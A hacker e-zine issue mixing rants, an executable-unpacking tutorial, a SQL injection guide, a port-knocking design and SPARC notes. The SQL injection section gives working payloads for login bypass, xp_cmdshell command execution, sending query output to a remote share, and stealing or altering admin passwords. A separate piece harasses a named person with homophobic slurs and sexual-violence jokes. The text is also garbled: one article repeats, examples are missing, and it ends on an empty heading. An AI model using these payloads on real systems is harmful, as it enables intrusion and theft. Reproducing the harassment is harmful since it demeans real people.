l'elephants avec les trunks huge izzue un ___ ___ / \____/ \ / / __ \ \ / | .. | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | -The jelqing elephant- 'ooo' 'ooo''ooo' "don't make fun of the circus animals!" * death to capitalism * feed the socialists * bush is evil * * let's all do drugs * working is for capitalists * * les francais toujours! * -------------------------------------------- # Un - l'Introduction Bonjour et valkomen to izzue un of 'l'elephants avec les trunks huge'. Before we commence, some shout outs are in order: SHOUT OUTZ: #b4b0, chrak (for the drugz), #phrack, #2600, tymat. \ / 31337 Et maintenant pour les zine..... what can we say for intro? Dunno... how about DOWN WITH CAPITALISM! IF YOU VOTED FOR BUSH YER ST00pID or something. FRANCE IS NUMBER UN! EVERYONE DO DRUGS AND NOBODY WORK AND LET'S ALL BE FAGS AND DO WHATEVER WE WANT WITH NO RESTRAINT! IT IS THE ONLY LOGICAL WAY!!! MORALS == ARBITRATION! ANARCHHYYYYYYYYY ANARCHYYYYYY FOREVERRRRRRRRRRRRRRRRR WE ARE EDUCATED YEW ARE NOT HAHA! Also please drive hydrogen powered cars and wear beads and smoke pot and denounce anything that becomes even mildly popular. Remember, YOU are ENLIGHTENED!!! You may not be able to explain exactly why you hate structure and order and things that have been proven by time, but WHO CARES?!?!?!?! WE ARE IN THE 21st CENTURY AND ARE BETTER THAN THE CAVE MEN THAT EXISTED ON EARTH 100 YEARS AGO. SO YOOOOOOOOOO0000000000000. IF YOU DO DRUGS ITZ OK CAUSE SOCIETY WILL PAY TO PUT YOU IN THE HOSPITAL! WERDDDDDDDD TO SOCIALISM! YAY CANADA! Idiots. Read on you fucking socialist leaches. FREE KEVIN! We worked hard to bring you this zine! Thanks to contributors! No matter what contributors or b4b0 or anyone else may say, this is 100% grade-A original! They are just jealous capitalists who probably carry guns *shiver*. As you will no doubt notice, there's nothing particularly substantive in here. Mainly dribble copied and modified slightly from computer books and online texts. BUT WHO CAREZZZZZZ?!?!?!?! We're here for PROPS and THATZ IT!!@#$ brought to you by: l'elephants and so forth memberz: wouldn't you like to know? ...and a generous grant from the Karl Marx Foundation "Every time I see a gun I piss my pants" -- our founder ***************************************************************************** -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ***************************************************************************** WORLD NEWS: "...The ascii icons foundation wishes to welcome its newborn member, totally fag-free, worksafe ATI© icon. ATI©, or the ASCII Thinking Icon which is represented by these three caracers consecutively: : double-point (<-- french) D open mouth that adds the twist of fun to the mix ? the innovative hand-scratching-chin imitation of real life deep thinking situations posture..." :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? The ascii thinking icon " :D? " © is published under the GNU public Lisence. and could be distributed, used, published and implemented in your IRC chatting lexic according to the GPL. examples on how to implement this 0day tech/art module in your IRC chatting: example #1 h0h0 hm should i take a piss :D? example #2 this code you just sent me doesnt compile well I think it needs reviewing :D? Have fun with it! XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 'lelephants BRINGING DIRECTION TO YOU XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .[ #b4b0 @ efnet re-opened for public and gay as ever ]. WERD TO LES ANIMAUX!!@#$ .-------->[FREEWAY OPEN:B4B0]<----------. | ROAD CONDITIONS | V $ [*] 59 North CAUSION: Hevy Dope Fog | + ph1x $ [x] E18 East OPEN: CAUSION SWERVED | + rdxz $\ [u] 99 North OPEN: Slight Winds | \ + crypt1 $ \ [o] 10 West OPEN: Delivering Your Milk |______\________ + MiLk-MaN $_______________| [+] 91 South CLOSED: Banging Your Mom | / | | + tsai $ / | | [z] | / | _|_____________________________ + $ / | | [%] Route 20 East CAUSION: ROAD WORK | | | rdxz moms house: 3,334 miles + cervix $ | | ph1x drug lab: 1.45 miles [i] 49 North Closed: Flooding | | | San Fransisco: 534 miles + polder $ | | m4tts house: 535 miles [+] 50 West Closed: Rock Slide | | | House of Kung Foo: -20 miles + lusta $ | | h00kahs Canadian House [%] 1 South Open: Mexico Bound | | | Of Bacon: Not Far enough + p4bell $ | | gH Jail Cell: 734 miles V | | | | | | |______________________________| `------->[ We Be Grubbin !!! ]<--------' | | || || | | || || | | || || | | || || .......[ issue # 011 7/05].....................................|___|........||.............|| [I]=[0x00] INTRO .x.[chrak].x. [*] :S: :*: [S]=[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. [B] :U: :4: [E]=[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x. [B] :*: :0: [#]=[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x. [H] :0: :E: [1]=[0x04] Re-Designed Port Knocking Security .x.[crypt1].x. [H] :1: :B: [*]=[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x [4] :*: :B: [*]=[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x [0] : : :*: [*]=[0x07] How to build a leet recording spy kit .x[wolfinux].x [4] : : :L: [*]=[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x [I] : : :F: [*]=[0x09] Making the Perfect Summertime Lemonade .x[t.Transient] [E] : : :*: [*]=[0x0A] EMPTY SPACE HERE [*] :.:......................................................................................' XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x00] INTRO .x.[chrak].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX OFFICIAL b4b0 drink: summertime lemonade PEICE ABOUT b4b0 10 BEING MORE SHITTY THEN THIS AND BEING SKIPPED TO 11 WELL WELL WELL THIS IS WHERE THE INTRO IS GOING. yes we are having http://www.chrakworld.com pimped in this issue. . . . . . . . . [lelephant note: .... what?] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [Another fine article brought to yuo by b4b0!!!!1!! -ed] Welcome people, is about Big Money Bullshit. I don't know about everyone else, but i can tell you, that it pisses me the fuck off,every time i see one of thoughs "Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit self checkout systems. Now its bad enough that these companies move into every town and take out mom&pop shops where, they buy things in bulk and sell them for a discount . But to take away jobs, i feel this should be a human right concern. I can understand Teknology but where do you draw the line. Most places use 4 - 8 self serving registers which are monitored by 1 real person. That means 3-7 jobs are taken away from one store at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store. Now if u want to get realy teknical lets look at how many of these stores there are. Im gong to just give a uneducated guess. For the sake of argument lets say theres 1,000 Walmarts, (everyone knows theres more). now thats 14,000 jobs they just elminated. Lets do some math. now 14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000 week.. ect. Now thats alot of money you say. I say thats pocket change for the amount of jobs that are being taken away for such a simple idea. Thats just greed, they already have a huge margin of business, why do they need to take jobs away from us. What i would like to know when its enough?, or whats next? Are we going to be going to school though our computers or Tv's? Dam, waitthat shits already im progress.... How lazy are we becomming? I hope someone is as pissed off about this shit as i am. I hope im not the only one that this shit bothers. I mean think about it, these companys are just having us shop in a warehouse, checking our self out , just having someone make sure we arent stealing and thats it. Anyways I'm done bitching, i just think this shit is FUCKED UP. . . . . . . . . [lelephant note: How profound.] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Software used: UPX 1.24, OllyDbg , OllyDump, Imprec I have seen lots of tuts for UPX and they make things quite crazy/complex so I made this little tut just to show/teach you all how simple it is and allow any kid to do it :P Ok, so here goes The start of any upx packed exeuctiable will look like this in OLLYDBG (PACKER ENTRY POINT) - PEP 60 pushad BEAEB04000 mov esi,xxxxxxx 8DBE525FFFFF lea edi,[esi+xxxx] 57 push edi 83CDFF or ebp,-001 EB10 jmp xxxxxx ;Unpacking Loop (useless to follow) In all other tuts I have seen the authors make you follow this jmp and follow t he instructions to find the OEP. I know its a usefull idea to teach you about other packers but hell we just want to un pack UPX dont we :P So scroll down a bit and you will see something like the following: (UNPACK INSTRUCTIONS) FF96 D0AE0100 CALL DWORD PTR DS:[ESI+1AED0] 61 popad ;Restore Registers E90826FFFF jmp xxxxx ;(OEP) Of The Unpacked Program Goto the line with the POPAD and put a breakpoint using f2. Then press F7 one t ime and you will land on the JMP XXXX instruction this is our OEP so remember this. Now press F7 one more time and it will land you in the REAL UNPACKED code. Wow that was hard wasnt it? ok now click plugins->ollydump->Dump Debugged Proce ss. Leave all the options alone and note the Entry point value which is next to the (GET EIP as OEP) button. OK, now we have a unpacked exe file which does not run. So whats your first guess what we need to fix? IMPORT TABLES correct your a genious now. So lets fire up Imprec and fire up the orig packed program and attach to the orig proccess. Remember t hat address I told you to note? ok type it into the (OEP) box do not worry about adding in the zeros it will do it for you. Mine was (6AE0) so I enter it in. Now click IAT auto search and wait a second. Now click (Get Imports). click show in valid and if you see any that say ( VALID:NO ) Press the (Auto Trace) button and wait. now click (Fix Dump) and s elect the unapcked file you saved. WHOLA, we are done and the program is now unpacked and running. You may want to remov e the UPX0 tags in the headings but i wont get into that here. NOTES: sorry to all you unpacker gods, for not making this super complex for al l the newbs :P -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ Software used: ASPACK (any version), OllyDbg , OllyDump, Imprec I have seen lots of tuts for ASPACK and they make things quite crazy/complex so I made this little tut just to show/teach you all how simple it is and allow any kid to do it :P Ok, so here goes The start of any aspack packed exeuctiable will look like this in OLLYDBG (PACKER ENTRY POINT) - PEP 01013001 > 60 PUSHAD 01013002 E8 03000000 CALL NOTEPAD.0101300A 01013007 -E9 EB045D45 JMP 465E34F7 0101300C 55 PUSH EBP 0101300D C3 RETN In all other tuts I have seen the authors make you follow this call and follow the instructions to find the OEP. I know its a usefull idea to teach you about other packers but hell we just want to un pack ASPACK dont we :P So scroll down a bit and you will see something like the following: 010133AF 61 POPAD <-- break point 010133B0 75 08 JNZ SHORT NOTEPAD.010133BA <--- F7 010133B2 B8 01000000 MOV EAX,1 010133B7 C2 0C00 RETN 0C 010133BA 68 E06A0001 PUSH NOTEPAD.01006AE0 <-- will land here an d press F7 010133BF C3 RETN <--- F7 *hint* in olly you can press CTRL-B and type in 61 75 in the HEX +02 box and it will find this for you. How cool for olly ;) ok, so set a break point on the popad and press f9 to run the program and it sh ould break on this spot then f7 till you hit the push and then f7 into the ret and then dump. 01006AE0 6A DB 6A ; CHAR 'j' 01006AE1 70 DB 70 ; CHAR 'p' 01006AE2 68 DB 68 ; CHAR 'h' 01006AE3 88 DB 88 01006AE4 18 DB 18 will look something like this all messed up. You can press CTRL-A to analsys th e code to see what it looks like. After you do the dump you will need to fix it with imprec. I will not cover thi s process here. I may write a howto for imprec someday. NOTES: sorry to all you unpacker gods, for not making this super complex for al l the newbs :P MORE TUTS COMMING SOON . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX #b4b0 - diesl0w [05/19/04] -- TABLE OF CONTENTS Chapter 1 - Introduction Chapter 2 - What To Look For? Chapter 3 - Vulnerability Testing Chapter 4 - Get Remote Execution Chapter 5 - OUTPUT via SQL Query Chapter 6 - Updating/Inserting Data into the database Chapter 7 - Protecting against SQL Injection Chapter 8 - Other Places To Visit Chapter 9 - Shout Outs Summary: The following article will get your foot in the door with the basic SQL Injection techniques and attempt to help you fully understand the methods used to prevent attempts and/or to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques and to protect themselves from such attacks. -- Chapter 1 - Introduction When a machine has only port 80 opened, your most trusted vulnerability scanner wont return anything useful, and you know that the admin always patch his server, we have to turn to finding vulnerabilities in their web server. SQL injection is one type of web server intrusion that requires nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS. This article does not introduce anything new, SQL injection has been widely written and used in the wild. The article was written basically because we would like to document some of techniques used during SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the Chapter 8, Other Places to Visit" for people who truly deserve credit for developing many techniques in SQL injection. 1.1 What is SQL Injection? It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. -- Chapter 2 What To Look For? Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
Everything between the
and
have potential parameters that might be exploitable. -- Chapter 3 Vulnerability Testing Start with a single quote trick. Input something like: hi' or 1=1-- Into login, or password, or even in the URL. Example: - Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://exploitable.host.com/index.asp?id=hi' or 1=1-- If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password. -- Chapter 4 Get Remote Execution Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution: '; exec master..xp_cmdshell 'ping 10.10.1.2'-- Try using double quote (") if single quote (') is not working. The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server: #tcpdump icmp If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures. -- Chapter 5 OUTPUT via SQL Query It is possible to use sp_makewebtask to write your query into an HTML: '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" But the target IP must folder "share" sharing for Everyone. 5.1 Grabbing Data Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database. Now, let's get the first login_name from the "admin_login" table: http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int. /index.asp, line 5 We now know there is an admin user with the login name of "neo". Finally, to get the password of "diesl0w" from the database: http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='diesl0w'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'temp123' to a column of data type int. /index.asp, line 5 We can now login as "diesl0w" with his password "temp123". -- Chapter 6 Updating/Inserting Data into the database When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo": http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'temp123' WHERE login_name='diesl0w'-- To INSERT a new record into the database: http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-- We can now login as "diesl0w" with the password of "temp123". -- Chapter 7 Protecting against SQL Injection Filter out characters like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from: - Input from users - Parameters from URL - Values from cookie For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab. Delete stored procedures that you are not using like: master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask -- Chapter 8 - Other Places To Visit One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm. http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6 Great article on gathering information from ODBC error messages: http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc A good summary of SQL Injection on various SQL Server on http://www.owasp.org/asac/input_validation/sql.shtml Senseport's article on reading SQL Injection: http://www.sensepost.com/misc/SQLinsertion.htm -- Chapter 9 - Shout Outs Just want to give a shout-out to the following: All old school gH members, might have split and went seperate ways, but not forgotten.. #cha0s @ Unet, #innuendo @ Unet, #LinuxHQ @ Unet/EFnet, #coders @ EFnet, #b4b0 @ EFnet, #sketchy @ EFnet, #hurricane @ EFnet zeb0r, exempt, clops, icbm, mosthated, mindphasr, REWN, and my people helping out on EFX Inc. . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x04] Re-Designed Port Knocking Security .x.[crypt1].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Hello everyone, im crypt1, ill be your guid through this artical. Basicly im going to be expressing some old ideas, some recent ideas, and kind of give a few new ideas. Lets start out on some old ideas. Now im assuming everyone reading this will have a basic understanding of port knocking / os fingerprinting. But before you run off just take a little trip with me :>. I was sitting back for a few days playing with O/S detection and the concept of Port Knocking. I figured that port knocking is a good idea, but needs improvements. Well i kind of came up with a new design or a way of doing port knocking. As some of u might know Port Knocking is usaly setup on a system to open closed services to privilaged (Private) users. The way most people set up port knocking is they have a firewall with a set of ports if not all ports firewalled, then they have a perl script tailing the log file of the connect()'s tried. Well when a sequence lets say ours is port 6 24 18 10 78 441 5 1, when throughs ports are tried scanned in x amount of time, our perl script would then tell the firewall to allow this ip address access to a certain port. Well thats just fine and dandy. There is some security in that. Which is just one layer of security. But heres where we start to add to the idea. What if we were to create a private reply seq: NMAP PRINT OUT: (NORMAL SYSTEM READOUT) (FAKE SYSTEM ID:x.b4b0.corenetwork.co.va.rz.moon.crazy) TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI= Server, PING TO Server ->client: Server: 64 bytes from priv.serv (0.0.0.0): icmp_seq=1 ttl=49 time=33.0 ms 64 bytes from priv.serv (0.0.0.0): icmp_seq=2 ttl=49 time=31.5 ms (NOTE: Lets Average out Time with 2 requests: 32.25 ) (USAGE: We will send 32.25 vaule to the client via Stunnel , which will be the clients key for its algorithm) CLIENT: 64 bytes from priv.client (0.0.0.0): icmp_seq=1 ttl=49 time=32.7 ms 64 bytes from priv.client (0.0.0.0): icmp_seq=2 ttl=49 time=30.6 ms (NOTE: Lets Average out Time with 2 requests: 31.65 ) (USAGE: Key assigned by Server: 32.25 (Client: MSG: 31.65) We can then Note that the ping vaule wont be to far apart (we could even go more into this but i wont now) , which would set our vaules for our Pre set algorithm :). Once Authinicated though that, You Could then Setup a USER/PASSWD port for another method of security using a SSL type Connection. It Just depends how Sensitive you want to be with your network :). Now Lets kind of lay this all out on how to make something like this: Client Script: (NOTE: U WILL WANT TO USE A REAL SCRIPTING LANGUAGE! HEH) value = run(./authinicate) // RUN AUTHINICATION SCRIPT if(vaule = 1) { program failed } // GET VAULE OF AUTHINICATION SCRPIT if(timeoutvalue = currentime) { loop(tryagain!) } // IF AUTHINICATION SCRIPT TAKES X TIME RETRY else { // ELSE ./$myprogram // IT WORKED NOW CONNECT TO X PORT WITH UR PROGRAM } Client AUTH SCRIPT: (NOTE: THIS ISNT A REAL SCRIPT JUST GIVES IDEA HOW TO DO IT) connect(PORTs) // CONNECT TO PORTS IN SEQENCE! ping(serv) // PING FOR ENCRYPTION MSG getkey(thekey) // GET KEY FROM SERVER FOR ENCRYPTION encrypt(thekey,pingvaule); // ENCRYPT PING VAULE WITH KEY VAULE GIVEN send(encrypt-msg); // SEND ENCRYPTED MSG WITH KEY VAULE SENT FROM SERVER return(vaule) // RETURN VAULE OF SUCCESS OR * Server Script: ( NOTE: U WILL WANT TO CREATE UR OWN REAL SCRIPTS ) fmsg = tail_firewall_log() // TAIL THE LOG FILE FOR CONNECTS(): parse(fmsg) // CREATE A PARSE FOR YOUR TAIL (LOOK FOR UR CONNECT SEQENCE) match(ports) // IF PORTS MATCH if(portvaules = private_user) // IF PORTS MATCH DO THIS fingerprint(pr-user) // FINGER PRINT USER FOR SPECIAL TCP SEQENCE {if (pr-print = pr-pr-print) { // IF FINGER PRINT MATCHS SPECIAL TCP SEQENCE getpingdelaytime(pr-user) // GET PING TIME FROM CLIENT CONNECTING send(pr-user,key) // SEND AVERAGE AS KEY ALGORITHM VAULE! get_responce() // GET RESPONCE FROM ALGORITHM KEY if(resp-pr-user= correct){ openfirewall(user-ip,service)} // IF MATCHS OPEN PORT FOR THIS CLIENT ONLY! } Current Software that acomplish parts of this: FPF: "Fingerprint Fuck" www.packetstormsecurity.nl NOTES: Fingerprint Fuck changes your Fringerprint information, its a LKM, so depending on Kernel version u might need to add suport. knock: "Port Knocker" www.packetstormsecurity.nl NOTE: This software is just one example of port knocking. MAIN NOTE: Please Realize that both software listed above are just starting points for this project, both programs should just be used as a refrence point if u dont understand how to do something. The programs listed would need alot of modification to acomplish this task. JUST ANOTHER B4b0 PRODUCTION [ CRYPT1 ] (Obsecurity isnt security, but what if we add security to obscurity would it be security then? :) ) *(NORTH)**(SOUTH)**(EAST)**(WEST)**(WEST)**(EAST)**(SOUTH)**(NORTH)**(SOUTH)**(EAST)**(WEST)**(NORTH)* * [0x01 UNKNOWN AUTHOR IntroDucktion Learning To Hate People With MoNEy * *(NORTH)**(SOUTH)**(EAST)**(WEST)**(WEST)**(EAST)**(SOUTH)**(NORTH)**(SOUTH)**(EAST)**(WEST)**(NORTH)* Welcome people, is about Big Money Bullshit. I don't know about everyone else, but i can tell you, that it pisses me the fuck off,every time i see one of thoughs "Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit self checkout systems. Now its bad enough that these companies move into every town and take out mom&pop shops where , they buy things in bulk and sell them for a discount. But to take away jobs, i feel this should be a human right concern. I can understand Teknology but where do you draw the line. Most places use 4 - 8 self serving registers which are monitored by 1 real person. That means 3-7 jobs are taken away from one store at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store. Now if u want to get realy teknical lets look at how many of these stores there are. Im gong to just give a uneducated guess. For the sake of argument lets say theres 1,000 Walmarts, (everyone knows theres more). now thats 14,000 jobs they just elminated. Lets do some math. now 14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000 week.. ect. Now thats alot of money you say. I say thats pocket change for the amount of jobs that are being taken away for such a simple idea. Thats just greed, they already have a huge margin of business, why do they need to take jobs away from us. What i would like to know when its enough?, or whats next? Are we going to be going to school though our computers or Tv's? Dam, waitthat shits already im progress.... How lazy are we becomming? I hope someone is as pissed off about this shit as i am. I hope im not the only one that this shit bothers. I mean think about it, these companys are just having us shop in a warehouse, checking our self out , just having someone make sure we arent stealing and thats it. Anyways I'm done bitching, i just think this shit is FUCKED UP. . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [ED NOTE: crypt1 must be Ghey to make this but we need Quality Content to fill our pages!] .-~'~. (.~ `. < To MucH D1ck From the NigHT b4 I x O ) g0t (_o_) ?: m4tt [tm] | __ / `\ U .` `~` 10 TOP THINGS YOU DONT NEED TO KNOW: 10. M4tts Gay. 9. He has Aids. 8. Reverting back to 10, m4tt likes ass. 7. Matt has recived a Reward from the Insitute of Cock suckers for not chocking on a 8 1/2 dick. 6. Matt puts out an add in the San Fransisco Times offering money to be gang raped. 5. Matt gets arrested for suliciding sex. 4. Matt is gang raped while in jail with a chizzel. 3. No one likes gay matt. 2. Matt keeps begging to be in b4b0. 1. Baned for being gay #b4b0 m4tt@smokin.crackrock.net . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX The meaning of this article is to put together various information and make a reasonable article about understaind Sparc stacks and registers. Sparc got 32 general purpose integer registers visible to the program at any time. From these 32, 8 registers are global, and 24 registers are in a register window. One window consists of 3 groups of 8 registers, the out, local and in registers. A sparc implementation can consist of 2 to 32 windows, even thou the most consists of 7 or 8 windows. The registers variable number is the main reason sparc is "scalable". The only 1 window that can be visible is determined by the CWP (current window pointer, which is part of the processor status register (PSR)). This is a five bit value that could be decremented/incremented by SAVE and RESTORE instructions. Those instructions are executed on procedure call and return. Basic idea being that the in registers contain incoming parameters, the local register make scratch registers, the out registers contain outgoing parameters and the global registers contain values that doesn't vary much between executions. The register windows overlap partially so the out registers become renamed by SAVE to become the in registers of the called procedure. Because of this, the memory traffic is lowered when going up and down the procedure call. Because this is a frequent operation the performance is improved. That is atleast the basic idea. Here's a table illustrating the overlap of registers (taken from Peter Magnuss on): register group mnemonic register address ~~~~~~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~~~~~~ global %g0-%g7 r[0]-r[7] out %o0-%o7 r[8]-r[15] local %l0-%l7 r[16]-r[23] in %i0-%i7 r[24]-r[31] Here you are able to see an implementation with 8 windows, numbered 0 to 7 ("w0" to "w7" in the table). Each window coincide to 24 registers, 16 of these are shared with other windows. Windows are arranged so like, window #0 borders #7. The usual cause of changing the topical window as pointed to by the Current Window Pointer, is the RESTORE and SAVE instructions that you can see in the middle. More rare is the supoervisor RETT instruction (return from trap) & the trap event (interrupt, exception, or the TRAP instruction). ----------------------------------------- Figure (sparcwin.gif): ----------------------------------------- In the top of the left of the figure, the "WIM" register is indicated. The Window Invalid Mask is a bit map of valid windows. It's used as a pointer, ie. exactly one bit is set in the WIM register, which indicates which window is invalid. In our figure (also taken from Peter's homepage, along with a lot of info, thx) it's window 7. Register windows are used to support procedure calls, so they could be looked at as a cache of the stack contents. The Window Invalid Mask (WIM) pointer indicates the number of how many procedure calls in a row can be taken without writing out data to the memory. In our figure the capacity of the register windows is fully utilized. Another potentional call will therefore exceed it's capacity and trigger a window overflow trap. A window underflow trap occurs when the register window cache at the other end is empty and more data has to be fetched from memory. That's it. Props for the article goes to Peter for being the resource of nearly everything here. This is basically my own way of expressing it all, no m4d 0d4y inph0z, sorry - just some good old useful txt you can't get too much of. Just for the hell of it, i've added some ascii of the typical layout of the sparc stack frame here: low addresses +-------------------------+ %sp --> | 16 words for storing | | LOCAL and IN registers | +-------------------------+ | one-word pointer to | | aggregate return value | +-------------------------+ | 6 words for callee | | to store register | | arguments | +-------------------------+ | outgoing parameters | | past the 6th, if any | +-------------------------+ | space, if needed, for | | compiler temporaries | | and saved floating- | | point registers | +-------------------------+ +-------------------------+ | space dynamically | | allocated via the | | alloca() library call | +-------------------------+ | space, if needed, for | | automatic arrays, | | aggregates, and | | addressable scalar | | automatics | +-------------------------+ %fp --> high addresses Should be fairly self-explanatory... Additional Sparc resources you may want to look into about sparc asm: URLs: [1] http://www.xgc.com/manuals/m1750-ada/xgc-ada-gdb/x3398.html [2] http://www.users.qwest.net/~eballen1/ [3] http://docs.sun.com/?q=assembly Books: [1] SPARC Architecture, Assembly Language Programming, and C (2nd Edition) Richard P. Paul ISBN: 0130255963 [2] SPARC Assembly Language Reference Manual (Solaris 8) Sun Microsystems, Inc ISBN: 1400522803 . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x07] How to build a leet recording spy kits .x[wolfinux].x 